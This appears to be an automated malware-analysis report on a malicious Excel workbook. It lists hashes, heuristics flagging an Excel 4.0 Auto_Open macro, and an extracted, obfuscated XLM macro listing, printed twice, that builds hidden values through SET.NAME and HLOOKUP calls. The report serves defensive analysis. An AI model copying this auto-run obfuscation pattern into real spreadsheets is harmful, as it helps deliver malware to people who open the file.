Office (OLE) malware analysis — malicious · 6fa215ed33a3d848

MALICIOUS

Office (OLE)

36.0 KB Created: 2020-11-27 11:37:57 Authoring application: Microsoft Excel First seen: 2020-12-25

MD5: 16006053f0faa742a56d400a82889734 SHA-1: a3f77ff41b1066715c5035dafe177c6e5060cf1b SHA-256: 6fa215ed33a3d8489289bbfb925b275415aae00aa08e215e08047250e816b284

140 Risk Score

Heuristics 3

Excel 4.0 Auto_Open defined name critical OLE_XLM_AUTOOPEN_DEFINEDNAME

oletools recovered an Auto_Open / Auto_Close entry from an Excel 4.0 macro sheet. The raw BIFF name can be tokenized or partially opaque to byte-string checks, but the recovered macro listing confirms the workbook has an XLM auto-execution entry.
XLM Auto_Open with dangerous formula APIs critical OLE_XLM_DANGEROUS_FN

Excel 4.0 macro sheet contains an Auto_Open / Auto_Close entry and dangerous XLM formula APIs that can invoke programs, write files, or transfer control without VBA.
Excel 4.0 (XLM) macro sheet present medium OLE_XLM_AUTOOPEN

Workbook contains an Excel 4.0 macro sheet sub-stream — XLM is rarely seen in modern legitimate workbooks and was a major Office malware vector during 2020-2022.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_macros.txt xlm-macro oletools.olevba.extract_all_macros (XLM macro listing) 6821 bytes

Filename	Kind	Source	Size
`xlm_macros.txt`	xlm-macro	oletools.olevba.extract_all_macros (XLM macro listing)	6821 bytes
SHA-256: `4fc19c5690f741776b2f687d83cca1a1eda472f3aab5a7265b34b4785a72806c`
Preview script First 1,000 lines of the extracted script ' 0085 14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible - Sheet ' 0085 20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible - OZrywwmJXKP ' 0018 23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d Sheet!D164 ' 0018 21 LABEL : Cell Value, String Constant - aZfBGO len=0 ' 0018 22 LABEL : Cell Value, String Constant - BHfWFiN len=0 ' 0018 21 LABEL : Cell Value, String Constant - biAUyT len=0 ' 0018 21 LABEL : Cell Value, String Constant - bVtnov len=0 ' 0018 20 LABEL : Cell Value, String Constant - DBOCc len=0 ' 0018 23 LABEL : Cell Value, String Constant - DUWyopAy len=0 ' 0018 22 LABEL : Cell Value, String Constant - GIXRuaZ len=0 ' 0018 26 LABEL : Cell Value, String Constant - HUSeHHxzEmO len=0 ' 0018 22 LABEL : Cell Value, String Constant - natTMLO len=0 ' 0018 20 LABEL : Cell Value, String Constant - NGCHD len=0 ' 0018 25 LABEL : Cell Value, String Constant - RwANGgKXDj len=0 ' 0018 22 LABEL : Cell Value, String Constant - TPZZyLr len=0 ' 0018 25 LABEL : Cell Value, String Constant - TQdfKCliqS len=0 ' 0018 20 LABEL : Cell Value, String Constant - txpjl len=0 ' 0018 21 LABEL : Cell Value, String Constant - uwpYCV len=0 ' 0018 27 LABEL : Cell Value, String Constant - UWrMKPNZUxfo len=0 ' 0018 22 LABEL : Cell Value, String Constant - VQBKTSt len=0 ' 0018 27 LABEL : Cell Value, String Constant - xEbekuQsjYhg len=0 ' 0018 24 LABEL : Cell Value, String Constant - XhweYpNQP len=0 ' 0018 24 LABEL : Cell Value, String Constant - XqRzsjDTO len=0 ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 002a 2 PRINTHEADERS : Print Row/Column Labels ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' 00fd 10 LABELSST : Cell Value, String Constant/ SST ' Sheet,Reference,Formula,Value ' OZrywwmJXKP,D73,"SET.NAME("XhweYpNQP",0+VALUE("0"))","" ' OZrywwmJXKP,D76,"SET.NAME("BHfWFiN",XhweYpNQP)","" ' OZrywwmJXKP,P76,"",934.00000000000000000000 ' OZrywwmJXKP,P77,"",700.00000000000000000000 ' OZrywwmJXKP,P78,"",145.00000000000000000000 ' OZrywwmJXKP,D79,"SET.NAME("xEbekuQsjYhg",XhweYpNQP)","" ' OZrywwmJXKP,P79,"",-749.00000000000000000000 ' OZrywwmJXKP,P80,"",488.00000000000000000000 ' OZrywwmJXKP,D81,"SET.NAME("txpjl",COUNTA(aZfBGO))","" ' OZrywwmJXKP,P81,"",100.00000000000000000000 ' OZrywwmJXKP,D83,"SET.NAME("NGCHD",COUNTA(DBOCc))","" ' OZrywwmJXKP,D87,[],"" ' OZrywwmJXKP,D89,"SET.NAME("uwpYCV","")","" ' OZrywwmJXKP,D92,"BHfWFiN","" ' OZrywwmJXKP,D96,"SET.NAME("TPZZyLr",HLOOKUP("",aZfBGO,BHfWFiN,FALSE))","" ' OZrywwmJXKP,D100,"HUSeHHxzEmO","" ' OZrywwmJXKP,D102,"SET.NAME("biAUyT",XhweYpNQP)","" ' OZrywwmJXKP,D105,[],"" ' OZrywwmJXKP,D110,"biAUyT","" ' OZrywwmJXKP,D115,"RwANGgKXDj","" ' OZrywwmJXKP,D119,"XqRzsjDTO","" ' OZrywwmJXKP,D124,"TQdfKCliqS","" ' OZrywwmJXKP,D126,"SET.NAME("natTMLO",VALUE(HLOOKUP("",DBOCc,TQdfKCliqS,FALSE)))","" ' OZrywwmJXKP,D129,"VQBKTSt","" ' OZrywwmJXKP,D133,"uwpYCV","" ' OZrywwmJXKP,D136,"xEbekuQsjYhg","" ' OZrywwmJXKP,D141,NEXT(),"" ' OZrywwmJXKP,D143,"DUWyopAy","" ' OZrywwmJXKP,D146,[],"" ' OZrywwmJXKP,D151,"bVtnov","" ' OZrywwmJXKP,D155,NEXT(),"" ' OZrywwmJXKP,D159,RETURN(),"" ' OZrywwmJXKP,D186,"SET.NAME("GIXRuaZ",D73)","" ' OZrywwmJXKP,D189,"aZfBGO","" ' OZrywwmJXKP,D191,"SET.NAME("DBOCc",R80C12)","" ' OZrywwmJXKP,D194,"SET.NAME("bVtnov",200)","" ' OZrywwmJXKP,D197,"SET.NAME("UWrMKPNZUxfo",4)","" ' OZrywwmJXKP,D199,GIXRuaZ(),"" ' OZrywwmJXKP,D200,HALT(),""

SHA-256: 4fc19c5690f741776b2f687d83cca1a1eda472f3aab5a7265b34b4785a72806c

Preview script

First 1,000 lines of the extracted script

' 0085     14 BOUNDSHEET : Sheet Information - worksheet or dialog sheet, visible -  Sheet
' 0085     20 BOUNDSHEET : Sheet Information - Excel 4.0 macro sheet, visible -  OZrywwmJXKP
' 0018     23 LABEL : Cell Value, String Constant - built-in-name 1 Auto_Open len=7 ptgRef3d  Sheet!D164 
' 0018     21 LABEL : Cell Value, String Constant - aZfBGO len=0 
' 0018     22 LABEL : Cell Value, String Constant - BHfWFiN len=0 
' 0018     21 LABEL : Cell Value, String Constant - biAUyT len=0 
' 0018     21 LABEL : Cell Value, String Constant - bVtnov len=0 
' 0018     20 LABEL : Cell Value, String Constant - DBOCc len=0 
' 0018     23 LABEL : Cell Value, String Constant - DUWyopAy len=0 
' 0018     22 LABEL : Cell Value, String Constant - GIXRuaZ len=0 
' 0018     26 LABEL : Cell Value, String Constant - HUSeHHxzEmO len=0 
' 0018     22 LABEL : Cell Value, String Constant - natTMLO len=0 
' 0018     20 LABEL : Cell Value, String Constant - NGCHD len=0 
' 0018     25 LABEL : Cell Value, String Constant - RwANGgKXDj len=0 
' 0018     22 LABEL : Cell Value, String Constant - TPZZyLr len=0 
' 0018     25 LABEL : Cell Value, String Constant - TQdfKCliqS len=0 
' 0018     20 LABEL : Cell Value, String Constant - txpjl len=0 
' 0018     21 LABEL : Cell Value, String Constant - uwpYCV len=0 
' 0018     27 LABEL : Cell Value, String Constant - UWrMKPNZUxfo len=0 
' 0018     22 LABEL : Cell Value, String Constant - VQBKTSt len=0 
' 0018     27 LABEL : Cell Value, String Constant - xEbekuQsjYhg len=0 
' 0018     24 LABEL : Cell Value, String Constant - XhweYpNQP len=0 
' 0018     24 LABEL : Cell Value, String Constant - XqRzsjDTO len=0 
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 002a      2 PRINTHEADERS : Print Row/Column Labels
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' 00fd     10 LABELSST : Cell Value, String Constant/ SST
' Sheet,Reference,Formula,Value
'  OZrywwmJXKP,D73,"SET.NAME("XhweYpNQP",0+VALUE("0"))",""
'  OZrywwmJXKP,D76,"SET.NAME("BHfWFiN",XhweYpNQP)",""
'  OZrywwmJXKP,P76,"",934.00000000000000000000
'  OZrywwmJXKP,P77,"",700.00000000000000000000
'  OZrywwmJXKP,P78,"",145.00000000000000000000
'  OZrywwmJXKP,D79,"SET.NAME("xEbekuQsjYhg",XhweYpNQP)",""
'  OZrywwmJXKP,P79,"",-749.00000000000000000000
'  OZrywwmJXKP,P80,"",488.00000000000000000000
'  OZrywwmJXKP,D81,"SET.NAME("txpjl",COUNTA(aZfBGO))",""
'  OZrywwmJXKP,P81,"",100.00000000000000000000
'  OZrywwmJXKP,D83,"SET.NAME("NGCHD",COUNTA(DBOCc))",""
'  OZrywwmJXKP,D87,[],""
'  OZrywwmJXKP,D89,"SET.NAME("uwpYCV","")",""
'  OZrywwmJXKP,D92,"BHfWFiN",""
'  OZrywwmJXKP,D96,"SET.NAME("TPZZyLr",HLOOKUP("*",aZfBGO,BHfWFiN,FALSE))",""
'  OZrywwmJXKP,D100,"HUSeHHxzEmO",""
'  OZrywwmJXKP,D102,"SET.NAME("biAUyT",XhweYpNQP)",""
'  OZrywwmJXKP,D105,[],""
'  OZrywwmJXKP,D110,"biAUyT",""
'  OZrywwmJXKP,D115,"RwANGgKXDj",""
'  OZrywwmJXKP,D119,"XqRzsjDTO",""
'  OZrywwmJXKP,D124,"TQdfKCliqS",""
'  OZrywwmJXKP,D126,"SET.NAME("natTMLO",VALUE(HLOOKUP("*",DBOCc,TQdfKCliqS,FALSE)))",""
'  OZrywwmJXKP,D129,"VQBKTSt",""
'  OZrywwmJXKP,D133,"uwpYCV",""
'  OZrywwmJXKP,D136,"xEbekuQsjYhg",""
'  OZrywwmJXKP,D141,NEXT(),""
'  OZrywwmJXKP,D143,"DUWyopAy",""
'  OZrywwmJXKP,D146,[],""
'  OZrywwmJXKP,D151,"bVtnov",""
'  OZrywwmJXKP,D155,NEXT(),""
'  OZrywwmJXKP,D159,RETURN(),""
'  OZrywwmJXKP,D186,"SET.NAME("GIXRuaZ",D73)",""
'  OZrywwmJXKP,D189,"aZfBGO",""
'  OZrywwmJXKP,D191,"SET.NAME("DBOCc",R80C12)",""
'  OZrywwmJXKP,D194,"SET.NAME("bVtnov",200)",""
'  OZrywwmJXKP,D197,"SET.NAME("UWrMKPNZUxfo",4)",""
'  OZrywwmJXKP,D199,GIXRuaZ(),""
'  OZrywwmJXKP,D200,HALT(),""

Open this report in the interactive analyzer, or submit your own file for analysis.